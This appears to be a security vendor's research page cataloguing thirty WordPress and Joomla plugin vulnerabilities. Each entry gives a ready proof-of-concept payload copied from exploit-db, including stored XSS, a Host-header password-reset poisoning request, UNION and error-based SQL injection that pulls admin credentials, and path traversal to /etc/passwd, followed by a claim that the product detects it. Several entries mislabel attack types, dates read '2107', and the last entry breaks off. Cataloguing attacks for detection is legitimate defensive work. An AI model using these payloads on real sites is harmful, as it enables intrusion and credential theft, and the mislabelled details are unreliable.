Research - SQL injection

Following are the list of SQL injection attacks that were detected by Centrora :

Attack 1:

Platform: WordPress 

Affected Websites: WordPress websites with version 4.2

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Remote File inclusion
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/36844/

Proof of concept:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>

What can an attacker do with the attack?

WordPress 4.2 are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively, the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

 Added On: 31/08/2107

 

 

Attack 2:

Platform: WordPress < 4.7.4

Affected Websites: WordPress websites with version less than 4.7.4

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Remote File inclusion
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/41963/

Proof of concept:

-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a default WordPress installation that is accessible by the IP address. WordPress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. Thus, the request that is received by the user (from the WordPress) will contain the domain name from the attacker and the information will be passed on to the attacker if the users decides to click it. Eventually the attacker will get enough information to reset the password and get access to the website.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora. 

Added On: 31/08/2107

 

 

Attack 3:

Platform: WordPress

Affected Websites: Wordpress websites with plugin Ultimate Product Catalogue 4.4.2

Attack Type:

  • SQL injection
  • Local File inclusion
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42263/

Proof of concept:

<form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<input type="submit">

What can an attacker do with the attack?

WordPress websites with the plugin Ultimate Product Catalogue 4.4.2 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “CatID” is not validates and used without sanitising in the database query. This acts as a back door for the attacker and they can pass SQL queries with the help of this variable. The above code will allow the attacker to get the username and password for the website

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 Added On: 31/08/2107

 

 

Attack 4:

Platform: WordPress

Affected Websites: WordPress websites with WP jobs <1.5

Attack Type:

  • SQL injection
  • Cross site scripting
  • Cross site request forgery
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42172/

Proof of concept

targetsite/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL

What can an attacker do with the attack?

WordPress websites with the plugin WP jobs with version less than 1.5 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “jobid” is not validates and used without sanitising in the database query. This acts as a back door for the attacker and they can pass SQL queries with the help of this variable. The above code will allow the attacker to run the SQL queries on the database.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 Added On: 31/08/2107

 

 

Attack 5:

Platform: Joomla

Affected Websites: Joomla websites with the component SecurityCheck 2.8.9

Attack Type:

  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/39879/

Proof of concept:

joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))=‘1

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component SecurityCheck 2.8.9 installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora. 

Added On: 31/08/2107

 

 

Attack 6:

Platform: Joomla

Affected Websites: Joomla websites with the component Twitch Tv 1.1

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 intrusion
  • Remote file inclusion
  • SQL injection

Source: https://www.exploit-db.com/exploits/42493/

Proof of Concept:

targetwebsite/index.php?option=com_twitchtv&view=twitch&username=[SQL] gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''=' 

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component Twitch Tv 1.1 installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora. 

 

Added On: 31/08/2107

 

 

Attack 7 : 

Platform: WordPress

Affected WebsitesWordPress websites with plugin IBPS online exam 1.0 

Attack Type:

  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/42351/

Proof of concept:

http://targetwebsite/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79and1=1

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a while attempting an exam on the website with the plugin IBPS online exam 1.0  installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

Attack 8 : 

Platform: WordPress 

Affected Websites:  Wordpress websites with plugin huge IT video gallery 2.0.4

Attack Type:

  • SQL injection
  • Cross site scripting
  • Cross site request forgery
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42082/

Proof of concept:

http://targetsite/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery&cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)

What can an attacker do with the attack?

WordPress websites with the plugin huge IT video gallery 2.0.4 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “cat_search” is not validated and used without sanitising in the database query. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.  Due to the missing nonce token, the attacker the vulnerable code is also directly exposed to attack vectors such as Cross Site request forgery (CSRF).

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

 

Attack 9 :

Platform: WordPress 

Affected Websites: Wordpress websites with plugin Wp-testimonials <3.4.1 

Attack Type:

  • SQL injection
  • Local file inclusion
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42166/

Proof of concept:

http://targetsite/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL

What can an attacker do with the attack?

WordPress websites with the plugin Wp-testimonials with version less than 3.4.1 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “testid” is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the id parameter to the wp-admin/admin.php  

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

 

Attack 10 : 

Platform: WordPress

Affected Websites : Wordpress websites with plugin event list <= 0.7.8

Attack Type:

  • SQL injection
  • Cross site scripting
  • Cross site request forgery
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42173/

Proof of concept:

http://targetsite/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

What can an attacker do with the attack?

WordPress websites with the plugin Event list with version less than 0.7.8 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “id” is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the id parameter to the wp-admin/admin.php  

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

 

Attack 11 :

Platform: WordPress

Affected Websites : Wordperss websites with plugin Watupro 5.5.1 

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 Intrusion
  • Remote file inclusion

Source: https://www.exploit-db.com/exploits/42291/

Proof of concept:

targetsite/ wp-admin/admin.php?page=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1

What can an attacker do with the attack?

WordPress websites with the plugin Watupro 5.5.1 is vulnerable to the SQL injection attack. This vulnerability exists because the variable “watupro_questions” is not validated and used without sanitising in the database query. This variable is submitted to the server while undertaking a test. This allows an un-authenticated user to execute arbitrary SQL commands via the watupro_questions parameter to the wp-admin/admin.php  

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Added On: 06/09/2107

 

 

Attack 12 :

Platform: WordPress 

Affected Websites : Wordperss websites with tribulant newsletters 4.6.4.2

Attack Type:

  • SQL injection
  • Directory traversal
  • Local file inclusion  
  • Layer 2 Intrusion

Source: https://www.exploit-db.com/exploits/42129/

Proof of concept:

http://targetsite/ wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini

What can an attacker do with the attack?

WordPress websites with the plugin tribulant newsletters 4.6.4.2 is vulnerable to the SQL injection attack. This vulnerability exists because the variable file, methoid.id, values and order is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php  

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

Attack 13 : 

Platform: WordPress 

Affected Websites :  WordPress websites with plugin WebDorado galley 1.3.29

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/41966/

Proof of concept:

 http://targetsite/wp-admin/admin.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

What can an attacker do with the attack?

WordPress websites with the plugin WebDorado galley 1.3.29 is vulnerable to the SQL injection attack. This vulnerability exists because the variable album_id is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php. Attacker can obtain the valid bwg_nonce value by previously visiting the settings page. Users that to do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Added On: 06/09/2107

 

Attack 14 :

Platform: WordPress 

Affected Websites: Wordpress websites with plugin spider event calendar 1.5.51 

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 inclusion
  • Remote file inclusion

Source: https://www.exploit-db.com/exploits/41857/

Proof of concept:

http://targetsite/wp-admin/admin.php?page=SpiderCalendar&search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)

 

What can an attacker do with the attack?

WordPress websites with the plugin spider event calendar 1.5.51 is vulnerable to the SQL injection attack. This vulnerability exists because the variable order_id is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php. Users that to do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Date added: 07/09/2017

 

Attack 15:

Platform: WordPress

Affected Websites: Wordpress websites with plugin mac photo gallery 3.0

Attack Type:

  • Directory traversal
  • Layer 2 Intrusion
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/41566/

Proof of concept:

http://targetsite/wp-admin/admin.php?page=mac-doc-gallery/macdownload.php?albid=../../../wp-load.php

 

What can an attacker do with the attack?

WordPress websites with the plugin mac photo gallery 3.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable albid is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php. Users that to do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora. 

Date added: 07/09/2017

 

 

Attack 16:  

Platform: WordPress 

Affected Websites: Wordpress websites with plugin pica photo gallery 1.0 

Attack Type:

  • Directory traversal
  • Layer 2 Intrusion
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/19016/

Proof of concept:

 http://targetsite/wp-admin/admin.php?page=pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd

What can an attacker do with the attack?

WordPress websites with the plugin pica photo gallery 1.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable imgname is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php. Users that to do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added: 07/09/2017

 

 

Attack 17:

Platform: WordPress 

Affected Websites: WordPress websites with plugin mail masta 1.0

Attack Type:

  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/41438/

Proof of concept:

 http://targetsite/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1

What can an attacker do with the attack?

WordPress websites with the plugin mail masta 1.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable filter_id is not validated and used without sanitising in the database query. This allows an authenticated user to execute arbitrary SQL commands via the parameters to the wp-admin/admin.php. Users that to do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Date added : 08/09/2017

 

Attack 18

Platform: Joomla 

Affected Websites : Joomla websites with the component survey force deluxe 3.2.4

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 intrusion
  • Remote file inclusion
  • SQL injection 

Source: https://www.exploit-db.com/exploits/42606/

Proof of Concept:

targetwebsite/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''=' 

 

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component survey force deluxe 3.2.4  installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

 

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Date added : 08/09/2017

 

Attack 19

Platform: Joomla

Affected Websites : Joomla with the component checklist 1.1.0

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 intrusion
  • Remote file inclusion
  • SQL injection 
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42607/

Proof of Concept:

joomla/index.php?option=our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component checklist 1.1.0 installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Date added : 08/09/2017

 

 

Attack 20

Platform: Joomla 

Affected Websites: Joomla website with component with the quiz deluxe 3.7.4

Attack Type:

  • Layer 2 intrusion
  • SQL injection 
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42589/

Proof of Concept:

targetsite/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=79and1=1

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component quiz deluxe 3.7.4 installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website.

 Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Date Added : 08/09/2017

 

 

Attack 21:

Platform: Joomla 

Affected Websites : Joomla websites with the component photo contest 1.0.2

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • Layer 2 intrusion
  • Remote file inclusion
  • SQL injection 

Source: https://www.exploit-db.com/exploits/42563/

Proof of Concept:

Targetsite/index.php?option=photo-contest/photocontest/vote?controller=photocontest&vid=1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='

What can an attacker do with the attack?

If an attacker sends a request similar to the one above to a Joomla website with the component photo contest 1.0.2 installed on it, the attacker has a chance to run SQL queries on the website. Running these queries on the website can allow the user to get information about the database which also includes the username and password of the website. 

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of cross site scripting.

Following are the contents of attack that are detected by the centrora.

Date Added : 08/09/2017

 

Attack 22:

Platform: Joomla

Affected Websites : Joomla websites with the component osDownloads 1.7.4

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery
  • Remote file inclusion

Source: https://www.exploit-db.com/exploits/42561/

Proof of concept:

http://targetsite/index.php?option=com_osdownloads&view=item&id=8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1

What can an attacker do with the attack?

Joomla websites with the plugin osDownloads 1.7.4 is vulnerable to the SQL injection attack. This vulnerability exists because the variable id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Date added : 11/09/2017

 

 

Attack 23: 

Platform: Joomla

Affected Websites : Joomla websites with the component responsive portfolio 1.6.1

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42564/

Proof of concept:

 http://targetsite/index.php?option=com_pofos&view=pofo&id=1OR1=1

What can an attacker do with the attack?

Joomla websites with the component responsive portfolio 1.6.1 is vulnerable to the SQL injection attack. This vulnerability exists because the variable id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added : 11/09/2017

 

Attack 24 : 

Platform: Joomla

Affected Websites : Joomla websites with the component bargain product VM3 1.0

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Local file inclusion
  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/42552/

Proof of concept:

http://targetsite/index.php?option=pazzari_vm3/?view=brainy&product_id=17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31

What can an attacker do with the attack?

Joomla websites with the component bargain product VM3 1.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable product_id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters product_id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Date added : 11/09/2017

 

 

Attack 25:

Platform: Joomla component price alert 3.0.2

Affected Websites : Joomla websites with the component price alert 3.0.2 

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Local file inclusion
  • Cross site scripting
  • Cross site request forgery
  • Remote file inclusion

Source: https://www.exploit-db.com/exploits/42553/

Proof of concept:

http://targetsite/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1

What can an attacker do with the attack?

Joomla websites with the component price alert 3.0.2 is vulnerable to the SQL injection attack. This vulnerability exists because the variable product_id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters product_id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added : 11/09/2017

 

 

Attack 26:

Platform: Joomla

Affected Websites: Joomla websites with the component flip wall 8.0 

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Local file inclusion
  • Remote file inclusion
  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/42524/

Proof of concept:

 http://targetsite/index.php?option=com_flipwall&task=click&wallid=811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1

What can an attacker do with the attack?

Joomla websites with the component bargain product VM3.1.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable wallid is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters wallid.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

Date added: 11/09/2017

 

 

Attack 27:

Platform: Joomla 

Affected Websites : Joomla websites with component sponsor wall 8.0 

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Remote file inclusion
  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/42525/

Proof of concept:

 http://targetsite/index.php?option=com_sponsorwall&task=click&wallid=86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1

What can an attacker do with the attack?

Joomla websites with the component sponsor wall 8.0 is vulnerable to the SQL injection attack. This vulnerability exists because the variable wallid is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters wallid.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added : 11/09/2107

 

 

Attack 28 : 

Platform: Joomla 

Affected Websites: Joomla websites with the component focal point 1.2.3

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Local file inclusion
  • Cross site scripting
  • Cross site request forgery

Source: https://www.exploit-db.com/exploits/42530/

Proof of concept:

http://targetsite/index.php?option=com_focalpoint&view=location&id=8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1

What can an attacker do with the attack?

Joomla websites with the component focal point 1.2.3 is vulnerable to the SQL injection attack. This vulnerability exists because the variable id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora. 

Date added : 11/09/2017

 

 

Attack 29:

Platform: Joomla 

Affected Websites : Joomla websites with the component Ajax Quiz 1.8

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery
  • Remote file inclusion

Source: https://www.exploit-db.com/exploits/42532/

Proof of concept:

http://targetsite/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=60+union+select+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)

What can an attacker do with the attack?

Joomla websites with the plugin Ajax quiz 1.8 is vulnerable to the SQL injection attack. This vulnerability exists because the variable cid is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters cid.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added : 12/09/2017

 

 

Attack 30:

Platform: Joomla 

Affected Websites : Joomla websites with the component Appointment 1.1

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42492/

Proof of concept:

http://targetsite/index.php?option=com_service-list?view=allorder&ser_id=84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))

What can an attacker do with the attack?

Joomla websites with the plugin Appointment 1.1 is vulnerable to the SQL injection attack. This vulnerability exists because the variable ser_id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters ser_id.

Can centrora detect the attack?

